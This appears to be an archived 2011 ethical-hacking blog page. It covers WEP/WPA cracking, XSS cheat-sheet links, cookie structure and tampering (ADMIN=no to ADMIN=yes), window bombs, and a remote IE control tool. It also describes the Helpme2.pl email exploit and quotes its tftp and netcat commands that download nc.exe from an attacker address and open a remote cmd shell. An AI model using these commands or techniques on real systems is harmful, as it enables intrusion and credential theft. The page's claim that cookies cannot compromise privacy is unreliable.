Web Vulnerability and Ethical Hacking- All about Information Security ! ! !: December 2011

Get the HACK out of here!

The more i think of Hacking, the more i'm convinced that nothing is Secure in this world. From your computer systems to the cell phone on which you just text-ed, everything system can fall down to one simple vulnerability or loop hole, which was left in your gadget box by it's developer. The only way to secure your information is by not turning on your gizmo.
Hacking is not a matter of chance, it is actually a lot of hard work done by a destructive mind. Well then what exactly do we mean by Ethical Hacking? The answer to this is simple, the hacking done in Ethics. But most of the people are confused by this sentence. All they ask me is how could Hacking be done in an Ethical way? Guys hacking is never ethical, its just the intention with which it is done. If the intention is positive, then it's penetration testing, done in a supervised manner, to avoid malicious Hacking. But, if the intentions are negative, then its malicious hacking. But being a hacker, i know this thing that nobody in my field has a white collar.
People using software for hacking or extracting information out of a person's computer are not really hackers. That could be done by anybody, by just downloading any of the freely and easily available softwares on the internet. These people are "script kiddies", who either are attention seekers or just have some small malicious intents. India doesn't have a very strong background in hacking, as their haven't been much of these "Hackers" . But here we are still struggling to make a job out of this.

Regards,
Ishan Chandra
[http://about.me/ishaanchandra]

Cracking Wireless Networks: How to Crack WEP or WPA Secured Networks

The video shows to how crack WEP- or WPA-secured networks. It also shows how to prevent people from cracking your wireless network(s)

---Do you want to share you views?? Just leave a comment here. you can also drop an email on ishanchandra@ymail.com

Free Download WiFi Slax Wireless Hacking Live CD v3.1 + Plug-ins,Updated

WEP is an encryption scheme based on the RC-4 cipher that is available on all 802.11a b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key which is usually a total of 64 or 128 bits long.

A semi-random 24 bit number called an Initialization Vector (IV) is part of the key so a 64 bit WEP key actually contains only 40 bits of strong encryption while a 128 bit key has 104. The IV is placed in encrypted frames header and is transmitted in plain text.

Traditionally cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets* a process that could take hours or even days depending on the volume of traffic passing over the wireless network. After enough packets were captured a WEP cracking program such as Aircrack would be used to find the WEP key.

Basic Directions:
1)Boot from CD

2)Get the WEP Key

3)Write it down

4)Reboot into Windows

5)Connect using WEP Key.

Boost Your Wi-Fi Signals With Beer Cans

I love a good hack, especially one that requires me to throw back a cold one before hand (or during). This simple wifi boost has actually been shown to increase signal strength by at least 2 to 4 bars. And, well, I will drink to that.

These instructions came to us via The Chive and we think they are most definitely worth checking out. But here is the most important question: what kind of beer will you use?

For this project you are going to need scissors, a utility knife, some adhesive putty and an empty beer can. More than one empty beer can is acceptable but don’t kid yourself, the router only needs the one.

The first step is to wash out your empty beer can, unless of course said beer is a can of Pabst Blue Ribbon. If it is PBR, promptly go drink a better beer. You really should be ashamed of yourself.

Once the can has dried, you will want to remove it’s pull tab.

Only perform this next step if you have not been drinking. Using the utility knife, saw off the bottom of the can. Chances are your can will not have a red dotted line. If you see one, put down the knife…you’ve had too much beer.

You’ll notice in the above step that the can’s pull tab has returned. Clearly, there are only two possible reasons for this. One, you are really drunk and you never removed the tab in the first place. Or–the more likely answer–beer cans can regenerate themselves.

It’s the home stretch! You just need to attach your modded beer can to the wifi router. Hopefully no other parts of the can have actually grown back. You now have beer-fi!

So, what kind of beer did you use?

XSS - Cross Site Scripting Cheat Sheet

XSS - Cross Site Scripting Cheat Sheet By Ishan

Note for you people: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum:

Click here for XSS (Cross Site Scripting) CHEAT SHEET

XSS Cheat Sheet by Valentin

Here you find my custom XSS and CSRF cheat sheet. I know that there are many good cheat sheets out there, but since some of them are offline from time to time, I decided to create a little collection of useful XSS stuff. I added some stuff from other well known cheat sheets (e.g. from http://ha.ckers.org/xss.html) , please scroll down to see a complete list of sources.

There XSS codes can be used to test your own website for XSS/CSRF vulnerabilities. Some of them even can be used to bypass various XSS/CSRF filters. I did not include any details or explanations since I assume you are experienced with this type of vulnerability and know what you are doing.

CLICK HERE for XSS Cheat Sheet by Valentin

What is Cookie ?

Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information among themselves between sessions. Remembering HTTP is stateless, this may simply be between requests for documents in a same session or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying show this to me next time you come in. Cookies cannot be shared (read or written) across DNS domains.

In correct client operation Domain A can't read Domain B's cookies, but there have been much vulnerability in popular web clients which have allowed exactly this. Under HTTP the server responds to a request with an extra header. This header tells the client to add this information to the client's cookies file or store the information in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created and that can read the variable.

flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.

path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as/reference/web protocols. A pathname of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.

secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.

expiration: The time that the variable will expire on. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed.

name: The name of the variable (in this case Apache).

The limit on the size of each cookie (name and value combined) is 4 kb. A maximum of 20 cookies per server or domain is allowed.

Cookies are the preferred method to maintain state in HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.

The extent of cookie manipulation depends on what the cookie is used for but usually ranges from session tokens to arrays that make authorization decisions.

Example from a real world example

Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;

The attacker can simply modify the cookie to;

Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;

Hacking Tool: Helpme2.pl

Helpme2.pl is an exploit code for WinHelp32.exe Remote Buffer Overrun vulnerability.
This tool generates an HTML file with a given hidden command.
When this HTML file is sent to a victim through e mail, it infects the victim's computer and executes the hidden code.

Helpme2.pl is an exploit code written to take advantage of the winhelp32.exe vulnerability. The perl script takes a command to execute (WinExec, SW_HIDE) and gives an html output file. There are two versions

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778

The exploit does the following:

Executes tftp.exe-i attacker.ip.address get nc.exe c: \winnt\system32\nc.exe
Executes nc.exe attacker.ip.address 80-e cmd.exe

This code generates an HTML file with a given hidden command. When the HTML file is sent to a victim through email, it infects the victim's computer and executes the hidden code.

Hacking Tool: WindowBomb

An email sent with such html files attached will create pop-up windows until the PC's memory gets exhausted.

Window bombs are code written to cause annoying behavior on the user's computer screen. These can be such as the ones seen include:

Deadly image	A. GIF which crashes the browser on clicking.
Uncloseable window	Opens a document that utilizes the JavaScript Unload event handler to reopen the document if you try to leave or close the window.
Invincible alert dialogue	Executes a function which generates an alert dialogue and then runs the function again
Reload-o-rama	Refreshes the document from the history 1000 times/second, leaving the back and stop buttons useless.
Window spawner	Continuously opens new windows until the ram or swap space is full.
Jiggy window	Causes the window to dance around on the screen so fast that the controls cannot be reached.
Jiggy window spawner	Creates and endless stream of little dancing windows.
While loop processor hog	executes an endless loop to chew up some processor time
Recursive frames	Opens a set of recursive frames until the ram or swap space is full.
Memory bomb	Dynamically allocates ram to the browser until the ram or swap space is full.
Super memory bomb	Opens a 100K document with numerous recursive tables and ordered lists.

http://www.securityfriday.com/ToolDownload/IEen

IEEN remotely controls Internet Explorer using DCOM.
If you knew the account name and the password of a remote machine, you can remotely control the software component on it using DCOM. For example Internet Explorer is one of the soft wares that can be controlled.

IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure, and efficient manner. DCOM is installed on most Windows machines by default and runs without noticed by the users.

However, if an attacker knew the account name and the password of a remote machine, he can remotely control the software component on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.

Summary of IE'en Functionalities:

Remotely connects to or activates Internet Explorer
Captures data sent and received using Internet Explorer
Even on SSL encrypted websites (e.g. Hotmail); IE'en can capture user ID and password in plain text.
Change the web page on the remote IE window.
Make the remote IE window visible / invisible

Attacking web applications is the easiest way to compromise hosts, networks and users.
Generally nobody notices web application penetration, until serious damage has been done.
Web application vulnerability can be eliminated to a great extent ensuring proper design specifications and coding practices as well as implementing common security procedures.
Various tools help the attacker to view the source codes and scan for security holes.
The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using an encrypted session such as SSL / "secure" cookies are advocated instead of using hidden fields, which are easily manipulated by attackers.
A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.
If the application accepts only expected input, then the XSS can be significantly reduced.

Regards,

Ishan Chandra

Download Free Internet Explorer Cookie Forensic Analysis Tool: GALLETA

Many important files within Microsoft Windows have structures that are undocumented. One of the principals of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there are a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Internet Explorer Cookie files. Since this analysis technique is executed regularly, we researched the structure of the data found in the cookie files. Galleta, the Spanish word meaning "cookie", was developed to examine the contents of the cookie files. The foundation of Galleta's examination methodology will be documented in an upcoming whitepaper. Galleta will parse the information in a Cookie file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Galleta is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: galleta [options]

-t Field Delimiter (TAB by default)

Example Usage:

[kjones:galleta/galleta_20030410_1/bin] kjones% ./galleta antihackertoolkit.txt > cookies.txt

Open cookies.txt as a TAB delimited file in MS Excel to further sort and filter your results

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

Learn How to collecting and analyzing cookies Using COOKIEDIGGER

CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

What are Web Beacons OR Web Bugs?

Web beacons, also called web bugs and clear GIFs are used in combination with cookies to help people running websites to understand the behaviour of their customers. A web beacon is typically a transparent graphic image (usually 1 pixel x 1 pixel) that is placed on a site or in an email.

The use of a web beacon allows the site to record the simple actions of the user opening the page that contains the beacon. The beacon is one of the ingredients of the page, just like other images and text except it is so small and clear that it is effectively invisible. Web pages and graphical emails use presentation code that tells your computer what to do when a page is opened. While they may contain some of the text that you see on the screen at the time they typically contains a number of instructions, or tags' that then ask the website's server to send you further content (such as an image or a block of text that changes frequently). Web beacons are retrieved in the same way and the action of calling the material from another server allows the event to be counted.

When a user's browser requests information from a website in this way certain simple information can also be gathered, such as: the IP address of your computer; time the material was viewed; the type of browser that retrieved the image; and the existence of cookies previously set by that server. This is information that is available to any web server you visit. Web beacons do not give any "extra" information away. They are simply a convenient way of gathering the simplest of statistics and managing cookies.

Web beacons are typically used by a third-party to monitor the activity of a site. Turning off the browser's cookies will prevent web beacons from tracking your specific activity. The web beacon may still record an anonymous visit from your IP address, but unique information will not be recorded.

For example a company owning a network of sites may use web beacons in order to count and recognise users travelling around its network. Rather than gathering statistics and managing cookies on all their servers separately, they can use web beacons to keep them all together. Being able to recognise you enables the site owner to personalise your visit and make it more user friendly.

Why do websites use Web Beacons?

Web beacons are used by website owners to log activity on their web pages and websites. Their purpose depends on what a site wants to understand about how visitors interact with pages. To see the demonstration how web beacons work, CLICK HERE.

Cookies are bad for privacy - Is that true?

This is a myth - cookies are a friendly internet tool primarily used by the advertising and e-commerce industry to make surfing easier and quicker. They have several roles, none of which can compromise your privacy:

Protection - to ensure you are a genuine visitor and not someone else using your password.
Authenticate and speed up your identification and e-commerce transactions.
Recognise preferences e.g. remember user names and passwords for websites.
Cap the frequency of ad serving and to make sure that advertisements are rotated and not duplicated during any one visit to a site

Many websites use the services of other companies to provide the content and services on their website. These third parties may provide content or services to more than one website. If they are using cookies, in theory, they can understand what that cookie does on a number of different sites.